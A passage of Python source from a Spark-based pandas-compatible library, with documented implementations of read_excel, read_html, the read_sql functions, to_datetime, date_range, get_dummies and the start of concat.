multiple sheets. Specify None to get all sheets.
Available cases:
* Defaults to ``0``: 1st sheet as a `DataFrame`
* ``1``: 2nd sheet as a `DataFrame`
* ``"Sheet1"``: Load sheet with name "Sheet1"
* ``[0, 1, "Sheet5"]``: Load first, second and sheet named "Sheet5"
as a dict of `DataFrame`
* None: All sheets.
header : int, list of int, default 0
Row (0-indexed) to use for the column labels of the parsed
DataFrame. If a list of integers is passed those row positions will
be combined into a ``MultiIndex``. Use None if there is no header.
names : array-like, default None
List of column names to use. If file contains no header row,
then you should explicitly pass header=None.
index_col : int, list of int, default None
Column (0-indexed) to use as the row labels of the DataFrame.
Pass None if there is no such column. If a list is passed,
those columns will be combined into a ``MultiIndex``. If a
subset of data is selected with ``usecols``, index_col
is based on the subset.
usecols : int, str, list-like, or callable default None
Return a subset of the columns.
* If None, then parse all columns.
* If str, then indicates comma separated list of Excel column letters
and column ranges (e.g. "A:E" or "A,C,E:F"). Ranges are inclusive of
both sides.
* If list of int, then indicates list of column numbers to be parsed.
* If list of string, then indicates list of column names to be parsed.
* If callable, then evaluate each column name against it and parse the
column if the callable returns ``True``.
squeeze : bool, default False
If the parsed data only contains one column then return a Series.
dtype : Type name or dict of column -> type, default None
Data type for data or columns. E.g. {'a': np.float64, 'b': np.int32}
Use `object` to preserve data as stored in Excel and not interpret dtype.
If converters are specified, they will be applied INSTEAD
of dtype conversion.
engine : str, default None
If io is not a buffer or path, this must be set to identify io.
Acceptable values are None or xlrd.
converters : dict, default None
Dict of functions for converting values in certain columns. Keys can
either be integers or column labels, values are functions that take one
input argument, the Excel cell content, and return the transformed
content.
true_values : list, default None
Values to consider as True.
false_values : list, default None
Values to consider as False.
skiprows : list-like
Rows to skip at the beginning (0-indexed).
nrows : int, default None
Number of rows to parse.
na_values : scalar, str, list-like, or dict, default None
Additional strings to recognize as NA/NaN. If dict passed, specific
per-column NA values. By default the following values are interpreted
as NaN.
keep_default_na : bool, default True
If na_values are specified and keep_default_na is False the default NaN
values are overridden, otherwise they're appended to.
verbose : bool, default False
Indicate number of NA values placed in non-numeric columns.
parse_dates : bool, list-like, or dict, default False
The behavior is as follows:
* bool. If True -> try parsing the index.
* list of int or names. e.g. If [1, 2, 3] -> try parsing columns 1, 2, 3
each as a separate date column.
* list of lists. e.g. If [[1, 3]] -> combine columns 1 and 3 and parse as
a single date column.
* dict, e.g. {{'foo' : [1, 3]}} -> parse columns 1, 3 as date and call
result 'foo'
If a column or index contains an unparseable date, the entire column or
index will be returned unaltered as an object data type. For non-standard
datetime parsing, use ``pd.to_datetime`` after ``pd.read_csv``
Note: A fast-path exists for iso8601-formatted dates.
date_parser : function, optional
Function to use for converting a sequence of string columns to an array of
datetime instances. The default uses ``dateutil.parser.parser`` to do the
conversion. Koalas will try to call `date_parser` in three different ways,
advancing to the next if an exception occurs: 1) Pass one or more arrays
(as defined by `parse_dates`) as arguments; 2) concatenate (row-wise) the
string values from the columns defined by `parse_dates` into a single array
and pass that; and 3) call `date_parser` once for each row using one or
more strings (corresponding to the columns defined by `parse_dates`) as
arguments.
thousands : str, default None
Thousands separator for parsing string columns to numeric. Note that
this parameter is only necessary for columns stored as TEXT in Excel,
any numeric columns will automatically be parsed, regardless of display
format.
comment : str, default None
Comments out remainder of line. Pass a character or characters to this
argument to indicate comments in the input file. Any data between the
comment string and the end of the current line is ignored.
skipfooter : int, default 0
Rows at the end to skip (0-indexed).
convert_float : bool, default True
Convert integral floats to int (i.e., 1.0 --> 1). If False, all numeric
data will be read in as floats: Excel stores all numbers as floats
internally.
mangle_dupe_cols : bool, default True
Duplicate columns will be specified as 'X', 'X.1', ...'X.N', rather than
'X'...'X'. Passing in False will cause data to be overwritten if there
are duplicate names in the columns.
**kwds : optional
Optional keyword arguments can be passed to ``TextFileReader``.
Returns
-------
DataFrame or dict of DataFrames
DataFrame from the passed in Excel file. See notes in sheet_name
argument for more information on when a dict of DataFrames is returned.
See Also
--------
DataFrame.to_excel : Write DataFrame to an Excel file.
DataFrame.to_csv : Write DataFrame to a comma-separated values (csv) file.
read_csv : Read a comma-separated values (csv) file into DataFrame.
Examples
--------
The file can be read using the file name as string or an open file object:
>>> pp.read_excel('tmp.xlsx', index_col=0) # doctest: +SKIP
Name Value
0 string1 1
1 string2 2
2 #Comment 3
>>> pp.read_excel(open('tmp.xlsx', 'rb'),
... sheet_name='Sheet3') # doctest: +SKIP
Unnamed: 0 Name Value
0 0 string1 1
1 1 string2 2
2 2 #Comment 3
Index and header can be specified via the `index_col` and `header` arguments
>>> pp.read_excel('tmp.xlsx', index_col=None, header=None) # doctest: +SKIP
0 1 2
0 NaN Name Value
1 0.0 string1 1
2 1.0 string2 2
3 2.0 #Comment 3
Column types are inferred but can be explicitly specified
>>> pp.read_excel('tmp.xlsx', index_col=0,
... dtype={'Name': str, 'Value': float}) # doctest: +SKIP
Name Value
0 string1 1.0
1 string2 2.0
2 #Comment 3.0
True, False, and NA values, and thousands separators have defaults,
but can be explicitly specified, too. Supply the values you would like
as strings or lists of strings!
>>> pp.read_excel('tmp.xlsx', index_col=0,
... na_values=['string1', 'string2']) # doctest: +SKIP
Name Value
0 None 1
1 None 2
2 #Comment 3
Comment lines in the excel input file can be skipped using the `comment` kwarg
>>> pp.read_excel('tmp.xlsx', index_col=0, comment='#') # doctest: +SKIP
Name Value
0 string1 1.0
1 string2 2.0
2 None NaN
"""
def pd_read_excel(io_or_bin, sn, sq):
return pd.read_excel(
io=BytesIO(io_or_bin) if isinstance(io_or_bin, (bytes, bytearray)) else io_or_bin,
sheet_name=sn,
header=header,
names=names,
index_col=index_col,
usecols=usecols,
squeeze=sq,
dtype=dtype,
engine=engine,
converters=converters,
true_values=true_values,
false_values=false_values,
skiprows=skiprows,
nrows=nrows,
na_values=na_values,
keep_default_na=keep_default_na,
verbose=verbose,
parse_dates=parse_dates,
date_parser=date_parser,
thousands=thousands,
comment=comment,
skipfooter=skipfooter,
convert_float=convert_float,
mangle_dupe_cols=mangle_dupe_cols,
**kwds
)
if isinstance(io, str):
if LooseVersion(pyspark.__version__) < LooseVersion("3.0.0"):
raise ValueError(
"The `io` parameter as a string is not supported if the underlying Spark is "
"below 3.0. You can use `pp.from_pandas(pd.read_excel(...))` as a workaround"
)
# 'binaryFile' format is available since Spark 3.0.0.
binaries = default_session().read.format("binaryFile").load(io).select("content").head(2)
io_or_bin = binaries[0][0]
single_file = len(binaries) == 1
else:
io_or_bin = io
single_file = True
pdf_or_psers = pd_read_excel(io_or_bin, sn=sheet_name, sq=squeeze)
if single_file:
if isinstance(pdf_or_psers, dict):
return OrderedDict(
[(sn, from_pandas(pdf_or_pser)) for sn, pdf_or_pser in pdf_or_psers.items()]
)
else:
return cast(Union[DataFrame, Series], from_pandas(pdf_or_psers))
else:
def read_excel_on_spark(pdf_or_pser, sn):
if isinstance(pdf_or_pser, pd.Series):
pdf = pdf_or_pser.to_frame()
else:
pdf = pdf_or_pser
kdf = from_pandas(pdf)
return_schema = force_decimal_precision_scale(
as_nullable_spark_type(kdf._internal.spark_frame.drop(*HIDDEN_COLUMNS).schema)
)
def output_func(pdf):
pdf = pd.concat(
[pd_read_excel(bin, sn=sn, sq=False) for bin in pdf[pdf.columns[0]]]
)
reset_index = pdf.reset_index()
for name, col in reset_index.iteritems():
dt = col.dtype
if is_datetime64_dtype(dt) or is_datetime64tz_dtype(dt):
continue
reset_index[name] = col.replace({np.nan: None})
pdf = reset_index
# Just positionally map the column names to given schema's.
return pdf.rename(columns=dict(zip(pdf.columns, return_schema.names)))
sdf = (
default_session()
.read.format("binaryFile")
.load(io)
.select("content")
.mapInPandas(lambda iterator: map(output_func, iterator), schema=return_schema)
)
kdf = DataFrame(kdf._internal.with_new_sdf(sdf))
if squeeze and len(kdf.columns) == 1:
return first_series(kdf)
else:
return kdf
if isinstance(pdf_or_psers, dict):
return OrderedDict(
[
(sn, read_excel_on_spark(pdf_or_pser, sn))
for sn, pdf_or_pser in pdf_or_psers.items()
]
)
else:
return read_excel_on_spark(pdf_or_psers, sheet_name)
def read_html(
io,
match=".+",
flavor=None,
header=None,
index_col=None,
skiprows=None,
attrs=None,
parse_dates=False,
thousands=",",
encoding=None,
decimal=".",
converters=None,
na_values=None,
keep_default_na=True,
displayed_only=True,
) -> List[DataFrame]:
r"""Read HTML tables into a ``list`` of ``DataFrame`` objects.
Parameters
----------
io : str or file-like
A URL, a file-like object, or a raw string containing HTML. Note that
lxml only accepts the http, ftp and file url protocols. If you have a
URL that starts with ``'https'`` you might try removing the ``'s'``.
match : str or compiled regular expression, optional
The set of tables containing text matching this regex or string will be
returned. Unless the HTML is extremely simple you will probably need to
pass a non-empty string here. Defaults to '.+' (match any non-empty
string). The default value will return all tables contained on a page.
This value is converted to a regular expression so that there is
consistent behavior between Beautiful Soup and lxml.
flavor : str or None, container of strings
The parsing engine to use. 'bs4' and 'html5lib' are synonymous with
each other, they are both there for backwards compatibility. The
default of ``None`` tries to use ``lxml`` to parse and if that fails it
falls back on ``bs4`` + ``html5lib``.
header : int or list-like or None, optional
The row (or list of rows for a :class:`~pp.MultiIndex`) to use to
make the columns headers.
index_col : int or list-like or None, optional
The column (or list of columns) to use to create the index.
skiprows : int or list-like or slice or None, optional
0-based. Number of rows to skip after parsing the column integer. If a
sequence of integers or a slice is given, will skip the rows indexed by
that sequence. Note that a single element sequence means 'skip the nth
row' whereas an integer means 'skip n rows'.
attrs : dict or None, optional
This is a dictionary of attributes that you can pass to use to identify
the table in the HTML. These are not checked for validity before being
passed to lxml or Beautiful Soup. However, these attributes must be
valid HTML table attributes to work correctly. For example, ::
attrs = {'id': 'table'}
is a valid attribute dictionary because the 'id' HTML tag attribute is
a valid HTML attribute for *any* HTML tag as per `this document
<http://www.w3.org/TR/html-markup/global-attributes.html>`__. ::
attrs = {'asdf': 'table'}
is *not* a valid attribute dictionary because 'asdf' is not a valid
HTML attribute even if it is a valid XML attribute. Valid HTML 4.01
table attributes can be found `here
<http://www.w3.org/TR/REC-html40/struct/tables.html#h-11.2>`__. A
working draft of the HTML 5 spec can be found `here
<http://www.w3.org/TR/html-markup/table.html>`__. It contains the
latest information on table attributes for the modern web.
parse_dates : bool, optional
See :func:`~pp.read_csv` for more details.
thousands : str, optional
Separator to use to parse thousands. Defaults to ``','``.
encoding : str or None, optional
The encoding used to decode the web page. Defaults to ``None``.``None``
preserves the previous encoding behavior, which depends on the
underlying parser library (e.g., the parser library will try to use
the encoding provided by the document).
decimal : str, default '.'
Character to recognize as decimal point (e.g. use ',' for European
data).
converters : dict, default None
Dict of functions for converting values in certain columns. Keys can
either be integers or column labels, values are functions that take one
input argument, the cell (not column) content, and return the
transformed content.
na_values : iterable, default None
Custom NA values
keep_default_na : bool, default True
If na_values are specified and keep_default_na is False the default NaN
values are overridden, otherwise they're appended to
displayed_only : bool, default True
Whether elements with "display: none" should be parsed
Returns
-------
dfs : list of DataFrames
See Also
--------
read_csv
DataFrame.to_html
"""
pdfs = pd.read_html(
io=io,
match=match,
flavor=flavor,
header=header,
index_col=index_col,
skiprows=skiprows,
attrs=attrs,
parse_dates=parse_dates,
thousands=thousands,
encoding=encoding,
decimal=decimal,
converters=converters,
na_values=na_values,
keep_default_na=keep_default_na,
displayed_only=displayed_only,
)
return cast(List[DataFrame], [from_pandas(pdf) for pdf in pdfs])
# TODO: add `coerce_float` and 'parse_dates' parameters
def read_sql_table(
table_name, con, schema=None, index_col=None, columns=None, **options
) -> DataFrame:
"""
Read SQL database table into a DataFrame.
Given a table name and a JDBC URI, returns a DataFrame.
Parameters
----------
table_name : str
Name of SQL table in database.
con : str
A JDBC URI could be provided as as str.
.. note:: The URI must be JDBC URI instead of Python's database URI.
schema : str, default None
Name of SQL schema in database to query (if database flavor
supports this). Uses default schema if None (default).
index_col : str or list of str, optional, default: None
Column(s) to set as index(MultiIndex).
columns : list, default None
List of column names to select from SQL table.
options : dict
All other options passed directly into Spark's JDBC data source.
Returns
-------
DataFrame
A SQL table is returned as two-dimensional data structure with labeled
axes.
See Also
--------
read_sql_query : Read SQL query into a DataFrame.
read_sql : Read SQL query or database table into a DataFrame.
Examples
--------
>>> pp.read_sql_table('table_name', 'jdbc:postgresql:db_name') # doctest: +SKIP
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
reader = default_session().read
reader.option("dbtable", table_name)
reader.option("url", con)
if schema is not None:
reader.schema(schema)
reader.options(**options)
sdf = reader.format("jdbc").load()
index_spark_columns, index_names = _get_index_map(sdf, index_col)
kdf = DataFrame(
InternalFrame(
spark_frame=sdf, index_spark_columns=index_spark_columns, index_names=index_names
)
) # type: DataFrame
if columns is not None:
if isinstance(columns, str):
columns = [columns]
kdf = kdf[columns]
return kdf
# TODO: add `coerce_float`, `params`, and 'parse_dates' parameters
def read_sql_query(sql, con, index_col=None, **options) -> DataFrame:
"""Read SQL query into a DataFrame.
Returns a DataFrame corresponding to the result set of the query
string. Optionally provide an `index_col` parameter to use one of the
columns as the index, otherwise default index will be used.
.. note:: Some database might hit the issue of Spark: SPARK-27596
Parameters
----------
sql : string SQL query
SQL query to be executed.
con : str
A JDBC URI could be provided as as str.
.. note:: The URI must be JDBC URI instead of Python's database URI.
index_col : string or list of strings, optional, default: None
Column(s) to set as index(MultiIndex).
options : dict
All other options passed directly into Spark's JDBC data source.
Returns
-------
DataFrame
See Also
--------
read_sql_table : Read SQL database table into a DataFrame.
read_sql
Examples
--------
>>> pp.read_sql_query('SELECT * FROM table_name', 'jdbc:postgresql:db_name') # doctest: +SKIP
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
reader = default_session().read
reader.option("query", sql)
reader.option("url", con)
reader.options(**options)
sdf = reader.format("jdbc").load()
index_spark_columns, index_names = _get_index_map(sdf, index_col)
return DataFrame(
InternalFrame(
spark_frame=sdf, index_spark_columns=index_spark_columns, index_names=index_names
)
)
# TODO: add `coerce_float`, `params`, and 'parse_dates' parameters
def read_sql(sql, con, index_col=None, columns=None, **options) -> DataFrame:
"""
Read SQL query or database table into a DataFrame.
This function is a convenience wrapper around ``read_sql_table`` and
``read_sql_query`` (for backward compatibility). It will delegate
to the specific function depending on the provided input. A SQL query
will be routed to ``read_sql_query``, while a database table name will
be routed to ``read_sql_table``. Note that the delegated function might
have more specific notes about their functionality not listed here.
.. note:: Some database might hit the issue of Spark: SPARK-27596
Parameters
----------
sql : string
SQL query to be executed or a table name.
con : str
A JDBC URI could be provided as as str.
.. note:: The URI must be JDBC URI instead of Python's database URI.
index_col : string or list of strings, optional, default: None
Column(s) to set as index(MultiIndex).
columns : list, default: None
List of column names to select from SQL table (only used when reading
a table).
options : dict
All other options passed directly into Spark's JDBC data source.
Returns
-------
DataFrame
See Also
--------
read_sql_table : Read SQL database table into a DataFrame.
read_sql_query : Read SQL query into a DataFrame.
Examples
--------
>>> pp.read_sql('table_name', 'jdbc:postgresql:db_name') # doctest: +SKIP
>>> pp.read_sql('SELECT * FROM table_name', 'jdbc:postgresql:db_name') # doctest: +SKIP
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
striped = sql.strip()
if " " not in striped: # TODO: identify the table name or not more precisely.
return read_sql_table(sql, con, index_col=index_col, columns=columns, **options)
else:
return read_sql_query(sql, con, index_col=index_col, **options)
def to_datetime(
arg, errors="raise", format=None, unit=None, infer_datetime_format=False, origin="unix"
):
"""
Convert argument to datetime.
Parameters
----------
arg : integer, float, string, datetime, list, tuple, 1-d array, Series
or DataFrame/dict-like
errors : {'ignore', 'raise', 'coerce'}, default 'raise'
- If 'raise', then invalid parsing will raise an exception
- If 'coerce', then invalid parsing will be set as NaT
- If 'ignore', then invalid parsing will return the input
format : string, default None
strftime to parse time, eg "%d/%m/%Y", note that "%f" will parse
all the way up to nanoseconds.
unit : string, default None
unit of the arg (D,s,ms,us,ns) denote the unit, which is an
integer or float number. This will be based off the origin.
Example, with unit='ms' and origin='unix' (the default), this
would calculate the number of milliseconds to the unix epoch start.
infer_datetime_format : boolean, default False
If True and no `format` is given, attempt to infer the format of the
datetime strings, and if it can be inferred, switch to a faster
method of parsing them. In some cases this can increase the parsing
speed by ~5-10x.
origin : scalar, default 'unix'
Define the reference date. The numeric values would be parsed as number
of units (defined by `unit`) since this reference date.
- If 'unix' (or POSIX) time; origin is set to 1970-01-01.
- If 'julian', unit must be 'D', and origin is set to beginning of
Julian Calendar. Julian day number 0 is assigned to the day starting
at noon on January 1, 4713 BC.
- If Timestamp convertible, origin is set to Timestamp identified by
origin.
Returns
-------
ret : datetime if parsing succeeded.
Return type depends on input:
- list-like: DatetimeIndex
- Series: Series of datetime64 dtype
- scalar: Timestamp
In case when it is not possible to return designated types (e.g. when
any element of input is before Timestamp.min or after Timestamp.max)
return will have datetime.datetime type (or corresponding
array/Series).
Examples
--------
Assembling a datetime from multiple columns of a DataFrame. The keys can be
common abbreviations like ['year', 'month', 'day', 'minute', 'second',
'ms', 'us', 'ns']) or plurals of the same
>>> df = pp.DataFrame({'year': [2015, 2016],
... 'month': [2, 3],
... 'day': [4, 5]})
>>> pp.to_datetime(df)
0 2015-02-04
1 2016-03-05
dtype: datetime64[ns]
If a date does not meet the `timestamp limitations
<http://pandas.pydata.org/pandas-docs/stable/timeseries.html
#timeseries-timestamp-limits>`_, passing errors='ignore'
will return the original input instead of raising any exception.
Passing errors='coerce' will force an out-of-bounds date to NaT,
in addition to forcing non-dates (or non-parseable dates) to NaT.
>>> pp.to_datetime('13000101', format='%Y%m%d', errors='ignore')
datetime.datetime(1300, 1, 1, 0, 0)
>>> pp.to_datetime('13000101', format='%Y%m%d', errors='coerce')
NaT
Passing infer_datetime_format=True can often-times speedup a parsing
if its not an ISO8601 format exactly, but in a regular format.
>>> s = pp.Series(['3/11/2000', '3/12/2000', '3/13/2000'] * 1000)
>>> s.head()
0 3/11/2000
1 3/12/2000
2 3/13/2000
3 3/11/2000
4 3/12/2000
dtype: object
>>> import timeit
>>> timeit.timeit(
... lambda: repr(pp.to_datetime(s, infer_datetime_format=True)),
... number = 1) # doctest: +SKIP
0.35832712500000063
>>> timeit.timeit(
... lambda: repr(pp.to_datetime(s, infer_datetime_format=False)),
... number = 1) # doctest: +SKIP
0.8895321660000004
Using a unix epoch time
>>> pp.to_datetime(1490195805, unit='s')
Timestamp('2017-03-22 15:16:45')
>>> pp.to_datetime(1490195805433502912, unit='ns')
Timestamp('2017-03-22 15:16:45.433502912')
Using a non-unix epoch origin
>>> pp.to_datetime([1, 2, 3], unit='D', origin=pd.Timestamp('1960-01-01'))
DatetimeIndex(['1960-01-02', '1960-01-03', '1960-01-04'], dtype='datetime64[ns]', freq=None)
"""
def pandas_to_datetime(pser_or_pdf) -> Series[np.datetime64]:
if isinstance(pser_or_pdf, pd.DataFrame):
pser_or_pdf = pser_or_pdf[["year", "month", "day"]]
return pd.to_datetime(
pser_or_pdf,
errors=errors,
format=format,
unit=unit,
infer_datetime_format=infer_datetime_format,
origin=origin,
)
if isinstance(arg, Series):
return arg.koalas.transform_batch(pandas_to_datetime)
if isinstance(arg, DataFrame):
kdf = arg[["year", "month", "day"]]
return kdf.koalas.transform_batch(pandas_to_datetime)
return pd.to_datetime(
arg,
errors=errors,
format=format,
unit=unit,
infer_datetime_format=infer_datetime_format,
origin=origin,
)
def date_range(
start=None,
end=None,
periods=None,
freq=None,
tz=None,
normalize=False,
name=None,
closed=None,
**kwargs
) -> DatetimeIndex:
"""
Return a fixed frequency DatetimeIndex.
Parameters
----------
start : str or datetime-like, optional
Left bound for generating dates.
end : str or datetime-like, optional
Right bound for generating dates.
periods : int, optional
Number of periods to generate.
freq : str or DateOffset, default 'D'
Frequency strings can have multiples, e.g. '5H'.
tz : str or tzinfo, optional
Time zone name for returning localized DatetimeIndex, for example
'Asia/Hong_Kong'. By default, the resulting DatetimeIndex is
timezone-naive.
normalize : bool, default False
Normalize start/end dates to midnight before generating date range.
name : str, default None
Name of the resulting DatetimeIndex.
closed : {None, 'left', 'right'}, optional
Make the interval closed with respect to the given frequency to
the 'left', 'right', or both sides (None, the default).
**kwargs
For compatibility. Has no effect on the result.
Returns
-------
rng : DatetimeIndex
See Also
--------
DatetimeIndex : An immutable container for datetimes.
Notes
-----
Of the four parameters ``start``, ``end``, ``periods``, and ``freq``,
exactly three must be specified. If ``freq`` is omitted, the resulting
``DatetimeIndex`` will have ``periods`` linearly spaced elements between
``start`` and ``end`` (closed on both sides).
To learn more about the frequency strings, please see `this link
<https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#offset-aliases>`__.
Examples
--------
**Specifying the values**
The next four examples generate the same `DatetimeIndex`, but vary
the combination of `start`, `end` and `periods`.
Specify `start` and `end`, with the default daily frequency.
>>> pp.date_range(start='1/1/2018', end='1/08/2018') # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2018-01-01', '2018-01-02', '2018-01-03', '2018-01-04',
'2018-01-05', '2018-01-06', '2018-01-07', '2018-01-08'],
dtype='datetime64[ns]', freq=None)
Specify `start` and `periods`, the number of periods (days).
>>> pp.date_range(start='1/1/2018', periods=8) # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2018-01-01', '2018-01-02', '2018-01-03', '2018-01-04',
'2018-01-05', '2018-01-06', '2018-01-07', '2018-01-08'],
dtype='datetime64[ns]', freq=None)
Specify `end` and `periods`, the number of periods (days).
>>> pp.date_range(end='1/1/2018', periods=8) # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2017-12-25', '2017-12-26', '2017-12-27', '2017-12-28',
'2017-12-29', '2017-12-30', '2017-12-31', '2018-01-01'],
dtype='datetime64[ns]', freq=None)
Specify `start`, `end`, and `periods`; the frequency is generated
automatically (linearly spaced).
>>> pp.date_range(
... start='2018-04-24', end='2018-04-27', periods=3
... ) # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2018-04-24 00:00:00', '2018-04-25 12:00:00',
'2018-04-27 00:00:00'],
dtype='datetime64[ns]', freq=None)
**Other Parameters**
Changed the `freq` (frequency) to ``'M'`` (month end frequency).
>>> pp.date_range(start='1/1/2018', periods=5, freq='M') # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2018-01-31', '2018-02-28', '2018-03-31', '2018-04-30',
'2018-05-31'],
dtype='datetime64[ns]', freq=None)
Multiples are allowed
>>> pp.date_range(start='1/1/2018', periods=5, freq='3M') # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2018-01-31', '2018-04-30', '2018-07-31', '2018-10-31',
'2019-01-31'],
dtype='datetime64[ns]', freq=None)
`freq` can also be specified as an Offset object.
>>> pp.date_range(
... start='1/1/2018', periods=5, freq=pd.offsets.MonthEnd(3)
... ) # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2018-01-31', '2018-04-30', '2018-07-31', '2018-10-31',
'2019-01-31'],
dtype='datetime64[ns]', freq=None)
`closed` controls whether to include `start` and `end` that are on the
boundary. The default includes boundary points on either end.
>>> pp.date_range(
... start='2017-01-01', end='2017-01-04', closed=None
... ) # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2017-01-01', '2017-01-02', '2017-01-03', '2017-01-04'],
dtype='datetime64[ns]', freq=None)
Use ``closed='left'`` to exclude `end` if it falls on the boundary.
>>> pp.date_range(
... start='2017-01-01', end='2017-01-04', closed='left'
... ) # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2017-01-01', '2017-01-02', '2017-01-03'], dtype='datetime64[ns]', freq=None)
Use ``closed='right'`` to exclude `start` if it falls on the boundary.
>>> pp.date_range(
... start='2017-01-01', end='2017-01-04', closed='right'
... ) # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2017-01-02', '2017-01-03', '2017-01-04'], dtype='datetime64[ns]', freq=None)
"""
assert freq not in ["N", "ns"], "nanoseconds is not supported"
assert tz is None, "Localized DatetimeIndex is not supported"
return cast(
DatetimeIndex,
pp.from_pandas(
pd.date_range(
start=start,
end=end,
periods=periods,
freq=freq,
tz=tz,
normalize=normalize,
name=name,
closed=closed,
**kwargs
)
),
)
def get_dummies(
data,
prefix=None,
prefix_sep="_",
dummy_na=False,
columns=None,
sparse=False,
drop_first=False,
dtype=None,
) -> DataFrame:
"""
Convert categorical variable into dummy/indicator variables, also
known as one hot encoding.
Parameters
----------
data : array-like, Series, or DataFrame
prefix : string, list of strings, or dict of strings, default None
String to append DataFrame column names.
Pass a list with length equal to the number of columns
when calling get_dummies on a DataFrame. Alternatively, `prefix`
can be a dictionary mapping column names to prefixes.
prefix_sep : string, default '_'
If appending prefix, separator/delimiter to use. Or pass a
list or dictionary as with `prefix.`
dummy_na : bool, default False
Add a column to indicate NaNs, if False NaNs are ignored.
columns : list-like, default None
Column names in the DataFrame to be encoded.
If `columns` is None then all the columns with
`object` or `category` dtype will be converted.
sparse : bool, default False
Whether the dummy-encoded columns should be be backed by
a :class:`SparseArray` (True) or a regular NumPy array (False).
In Koalas, this value must be "False".
drop_first : bool, default False
Whether to get k-1 dummies out of k categorical levels by removing the
first level.
dtype : dtype, default np.uint8
Data type for new columns. Only a single dtype is allowed.
Returns
-------
dummies : DataFrame
See Also
--------
Series.str.get_dummies
Examples
--------
>>> s = pp.Series(list('abca'))
>>> pp.get_dummies(s)
a b c
0 1 0 0
1 0 1 0
2 0 0 1
3 1 0 0
>>> df = pp.DataFrame({'A': ['a', 'b', 'a'], 'B': ['b', 'a', 'c'],
... 'C': [1, 2, 3]},
... columns=['A', 'B', 'C'])
>>> pp.get_dummies(df, prefix=['col1', 'col2'])
C col1_a col1_b col2_a col2_b col2_c
0 1 1 0 0 1 0
1 2 0 1 1 0 0
2 3 1 0 0 0 1
>>> pp.get_dummies(pp.Series(list('abcaa')))
a b c
0 1 0 0
1 0 1 0
2 0 0 1
3 1 0 0
4 1 0 0
>>> pp.get_dummies(pp.Series(list('abcaa')), drop_first=True)
b c
0 0 0
1 1 0
2 0 1
3 0 0
4 0 0
>>> pp.get_dummies(pp.Series(list('abc')), dtype=float)
a b c
0 1.0 0.0 0.0
1 0.0 1.0 0.0
2 0.0 0.0 1.0
"""
if sparse is not False:
raise NotImplementedError("get_dummies currently does not support sparse")
if columns is not None:
if not is_list_like(columns):
raise TypeError("Input must be a list-like for parameter `columns`")
if dtype is None:
dtype = "byte"
if isinstance(data, Series):
if prefix is not None:
prefix = [str(prefix)]
kdf = data.to_frame()
column_labels = kdf._internal.column_labels
remaining_columns = []
else:
if isinstance(prefix, str):
raise NotImplementedError(
"get_dummies currently does not support prefix as string types"
)
kdf = data.copy()
if columns is None:
column_labels = [
label
for label in kdf._internal.column_labels
if isinstance(
kdf._internal.spark_type_for(label), _get_dummies_default_accept_types
)
]
else:
if is_name_like_tuple(columns):
column_labels = [
label
for label in kdf._internal.column_labels
if label[: len(columns)] == columns
]
if len(column_labels) == 0:
raise KeyError(name_like_string(columns))
if prefix is None:
prefix = [
str(label[len(columns):])
if len(label) > len(columns) + 1
else label[len(columns)]
if len(label) == len(columns) + 1
else ""
for label in column_labels
]
elif any(isinstance(col, tuple) for col in columns) and any(
not is_name_like_tuple(col) for col in columns
):
raise ValueError(
"Expected tuple, got {}".format(
type(set(col for col in columns if not is_name_like_tuple(col)).pop())
)
)
else:
column_labels = [
label
for key in columns
for label in kdf._internal.column_labels
if label == key or label[0] == key
]
if len(column_labels) == 0:
if columns is None:
return kdf
raise KeyError("{} not in index".format(columns))
if prefix is None:
prefix = [str(label) if len(label) > 1 else label[0] for label in column_labels]
column_labels_set = set(column_labels)
remaining_columns = [
(
kdf[label]
if kdf._internal.column_labels_level == 1
else kdf[label].rename(name_like_string(label))
)
for label in kdf._internal.column_labels
if label not in column_labels_set
]
if any(
not isinstance(kdf._internal.spark_type_for(label), _get_dummies_acceptable_types)
for label in column_labels
):
raise NotImplementedError(
"get_dummies currently only accept {} values".format(
", ".join([t.typeName() for t in _get_dummies_acceptable_types])
)
)
if prefix is not None and len(column_labels) != len(prefix):
raise ValueError(
"Length of 'prefix' ({}) did not match the length of "
"the columns being encoded ({}).".format(len(prefix), len(column_labels))
)
elif isinstance(prefix, dict):
prefix = [prefix[column_label[0]] for column_label in column_labels]
all_values = _reduce_spark_multi(
kdf._internal.spark_frame,
[F.collect_set(kdf._internal.spark_column_for(label)) for label in column_labels],
)
for i, label in enumerate(column_labels):
values = all_values[i]
if isinstance(values, np.ndarray):
values = values.tolist()
values = sorted(values)
if drop_first:
values = values[1:]
def column_name(value):
if prefix is None or prefix[i] == "":
return value
else:
return "{}{}{}".format(prefix[i], prefix_sep, value)
for value in values:
remaining_columns.append(
(kdf[label].notnull() & (kdf[label] == value))
.astype(dtype)
.rename(column_name(value))
)
if dummy_na:
remaining_columns.append(kdf[label].isnull().astype(dtype).rename(column_name(np.nan)))
return kdf[remaining_columns]
# TODO: there are many parameters to implement and support. See pandas's pd.concat.
def concat(objs, axis=0, join="outer", ignore_index=False, sort=False) -> Union[Series, DataFrame]:
"""
Concatenate Koalas objects along a particular axis with optional set logic
along the other axes.
Parameters
----------
objs : a sequence of Series or DataFrame
Any None objects will be dropped silently unless
they are all None in which case a ValueError will be raised
axis : {0/'index', 1/'columns'}, default 0
The axis to concatenate along.
join : {'inner', 'outer'}, default 'outer'
How to handle indexes on other axis (or axes).
ignore_index : bool, default False
If True, do not use the index values along the concatenation axis. The
resulting axis will be labeled 0, ..., n - 1. This is useful if you are
concatenating objects where the concatenation axis does not have
meaningful indexing information. Note the index values on the other
axes are still respected in the join.
sort : bool, default False
Sort non-concatenation axis if it is not already aligned.
Returns
-------
object, type of objs
When concatenating all ``Series`` along the index (axis=0), a
``Series`` is returned. When ``objs`` contains at least one
